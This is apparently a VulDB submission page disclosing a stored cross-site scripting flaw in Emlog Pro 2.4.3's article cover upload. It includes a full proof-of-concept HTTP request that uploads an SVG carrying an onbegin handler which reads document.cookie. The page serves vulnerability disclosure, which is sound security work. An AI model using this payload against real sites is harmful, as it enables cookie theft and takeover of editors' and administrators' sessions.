Submit #468753: emlog Emlog Pro 2.4.3 Cross-Site Scripting (XSS)info

Title	emlog Emlog Pro 2.4.3 Cross-Site Scripting (XSS)
Description	Summary An XSS vulnerability has been discovered in emlog pro 2.4.3. The vulnerability stems from the fact that /admin/article.php does not filter malicious SVG files. This vulnerability allows an attacker with content editing permissions to exploit the system by uploading an SVG file containing malicious XML code as the cover image for an article. Details The vulnerability exists in the article cover image upload functionality. Attackers can upload an SVG file that contains malicious XML code. POC POST /admin/article.php?action=upload_cover HTTP/1.1 Host: target-ip Content-Length: 1116 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBXHN1jTPmYb3jbAq Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: [users'cookie] Connection: keep-alive ------WebKitFormBoundaryBXHN1jTPmYb3jbAq Content-Disposition: form-data; name="image"; filename="alert.svg" Content-Type: image/svg+xml <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 128 128"> <path fill="#D26383" d="M115.4 30.7L67.1 2.9c-.8-.5-1.9-.7-3.1-.7-1.2 0-2.3.3-3.1.7l-48 27.9c-1.7 1-2.9 3.5-2.9 5.4v55.7c0 1.1.2 2.4 1 3.5l106.8-62c-.6-1.2-1.5-2.1-2.4-2.7z" /> <path fill="#9C033A" d="M10.7 95.3c.5.8 1.2 1.5 1.9 1.9l48.2 27.9c.8.5 1.9.7 3.1.7 1.2 0 2.3-.3 3.1-.7l48-27.9c1.7-1 2.9-3.5 2.9-5.4V36.1c0-.9-.1-1.9-.6-2.8l-106.6 62z" /> <path fill="#fff" d="M85.3 76.1C81.1 83.5 73.1 88.5 64 88.5c-13.5 0-24.5-11-24.5-24.5s11-24.5 24.5-24.5c9.1 0 17.1 5 21.3 12.5l13-7.5c-6.8-11.9-19.6-20-34.3-20-21.8 0-39.5 17.7-39.5 39.5s17.7 39.5 39.5 39.5c14.6 0 27.4-8 34.2-19.8l-12.9-7.6z" /> <path d="M82.1 61.8h5.2v-5.3h4.4v5.3H97v4.4h-5.3v5.2h-4.4v-5.2h-5.2v-4.4zm18.5 0h5.2v-5.3h4.4v5.3h5.3v4.4h-5.3v5.2h-4.4v-5.2h-5.2v-4.4z" fill="#fff" /> <animate onbegin="alert(document.cookie)"></animate> </svg> ------WebKitFormBoundaryBXHN1jTPmYb3jbAq--
Source	⚠️ https://github.com/emlog/emlog/issues/312
User	jiashenghe (UID 39445)
Submission	12/25/2024 07:38 (1 Year ago)
Moderation	01/04/2025 10:53 (10 days later)
Status	Accepted
VulDB entry	290214 [Emlog Pro up to 2.4.3 Cover Upload article.php?action=upload_cover image cross site scripting]
Points	20

◂ Previous Overview Next ▸

Do you know our Splunk app?

Download it now for free!